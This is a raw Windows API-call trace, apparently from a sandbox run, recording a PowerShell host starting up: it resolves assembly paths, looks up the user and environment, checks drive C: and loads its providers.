	[0616.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.635] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0616.635] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0616.636] CoTaskMemFree (pv=0x1b901f20) 
	[0616.636] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.636] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0616.636] CoTaskMemFree (pv=0x419ce0) 
	[0616.637] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3502e18*="Environment", lpRawData=0x3502ba8) returned 1
	[0616.638] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.638] CoTaskMemFree (pv=0x49d140) 
	[0616.639] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.639] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0616.639] CoTaskMemFree (pv=0x49d140) 
	[0616.639] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.639] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0616.639] CoTaskMemFree (pv=0x49d140) 
	[0616.640] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x28d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0616.640] SetErrorMode (uMode=0x1) returned 0x1
	[0616.640] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x28d680 | out: lpFileInformation=0x28d680*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0616.640] SetErrorMode (uMode=0x1) returned 0x1
	[0616.641] GetLogicalDrives () returned 0x4
	[0616.642] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.643] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0616.643] SetErrorMode (uMode=0x1) returned 0x1
	[0616.644] CoTaskMemAlloc (cb=0x68) returned 0x49c080
	[0616.644] CoTaskMemAlloc (cb=0x68) returned 0x49c010
	[0616.644] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x49c080, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x28d650, lpMaximumComponentLength=0x28d64c, lpFileSystemFlags=0x28d648, lpFileSystemNameBuffer=0x49c010, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28d650*=0x9c354b42, lpMaximumComponentLength=0x28d64c*=0xff, lpFileSystemFlags=0x28d648*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0616.644] CoTaskMemFree (pv=0x49c080) 
	[0616.644] CoTaskMemFree (pv=0x49c010) 
	[0616.645] SetErrorMode (uMode=0x1) returned 0x1
	[0616.645] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0616.645] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.645] SetErrorMode (uMode=0x1) returned 0x1
	[0616.645] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d5f0 | out: lpFileInformation=0x28d5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0616.645] SetErrorMode (uMode=0x1) returned 0x1
	[0616.645] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.646] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0616.646] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0616.646] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.646] SetErrorMode (uMode=0x1) returned 0x1
	[0616.647] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0616.647] SetErrorMode (uMode=0x1) returned 0x1
	[0616.647] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.647] SetErrorMode (uMode=0x1) returned 0x1
	[0616.647] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d420 | out: lpFileInformation=0x28d420*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0616.647] SetErrorMode (uMode=0x1) returned 0x1
	[0616.647] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0616.647] SetErrorMode (uMode=0x1) returned 0x1
	[0616.647] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d4c0 | out: lpFileInformation=0x28d4c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0616.647] SetErrorMode (uMode=0x1) returned 0x1
	[0616.648] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0616.648] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0616.648] CoTaskMemFree (pv=0x1b901f20) 
	[0616.648] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.648] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0616.648] CoTaskMemFree (pv=0x419ce0) 
	[0616.649] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3509f08*="FileSystem", lpRawData=0x3509c98) returned 1
	[0616.649] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.649] CoTaskMemFree (pv=0x49d140) 
	[0616.650] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0616.650] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0616.650] CoTaskMemFree (pv=0x1b901f20) 
	[0616.650] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0616.650] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0616.650] CoTaskMemFree (pv=0x419ce0) 
	[0616.651] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x350f748*="Function", lpRawData=0x350f4d8) returned 1
	[0616.651] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0616.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.651] CoTaskMemFree (pv=0x49d140) 
	[0616.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.190] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0617.190] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0617.190] CoTaskMemFree (pv=0x1b901f20) 
	[0617.190] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0617.190] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0617.191] CoTaskMemFree (pv=0x419ce0) 
	[0617.191] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3531f70*="Registry", lpRawData=0x3531d00) returned 1
	[0617.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0617.945] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0617.945] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0617.946] CoTaskMemFree (pv=0x1b901f20) 
	[0617.946] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0617.946] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0617.946] CoTaskMemFree (pv=0x419ce0) 
	[0617.946] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3537388*="Variable", lpRawData=0x3537118) returned 1
	[0617.948] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0617.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.949] CoTaskMemFree (pv=0x49d140) 
	[0617.951] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0617.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0617.952] CoTaskMemFree (pv=0x49d140) 
	[0617.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0617.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0617.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0617.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0618.735] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0618.735] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d8c8) returned 0x1
	[0619.428] CoTaskMemFree (pv=0x1b901f20) 
	[0619.428] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0619.428] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d908) returned 1
	[0619.429] CoTaskMemFree (pv=0x419ce0) 
	[0619.429] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x354b1e0*="Certificate", lpRawData=0x354af70) returned 1
	[0620.254] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.254] CoTaskMemFree (pv=0x49d140) 
	[0620.257] GetLogicalDrives () returned 0x4
	[0620.257] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0620.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0620.258] CoTaskMemAlloc (cb=0x20e) returned 0x486980
	[0620.258] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x486980 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0620.258] CoTaskMemFree (pv=0x486980) 
	[0620.260] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.260] CoTaskMemFree (pv=0x49d140) 
	[0620.260] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.260] CoTaskMemFree (pv=0x49d140) 
	[0620.275] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.276] CoTaskMemFree (pv=0x49d140) 
	[0620.277] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.277] CoTaskMemFree (pv=0x49d140) 
	[0620.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.278] SetErrorMode (uMode=0x1) returned 0x1
	[0620.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.278] SetErrorMode (uMode=0x1) returned 0x1
	[0620.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.278] SetErrorMode (uMode=0x1) returned 0x1
	[0620.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.278] SetErrorMode (uMode=0x1) returned 0x1
	[0620.278] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0620.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0620.279] CoTaskMemFree (pv=0x49d140) 
	[0620.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.284] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0620.284] SetErrorMode (uMode=0x1) returned 0x1
	[0620.284] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0620.284] SetErrorMode (uMode=0x1) returned 0x1
	[0620.284] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0620.284] SetErrorMode (uMode=0x1) returned 0x1
	[0620.285] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0620.285] SetErrorMode (uMode=0x1) returned 0x1
	[0620.285] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0620.285] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0620.285] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.285] SetErrorMode (uMode=0x1) returned 0x1
	[0620.285] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0620.285] SetErrorMode (uMode=0x1) returned 0x1
	[0620.285] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.285] SetErrorMode (uMode=0x1) returned 0x1
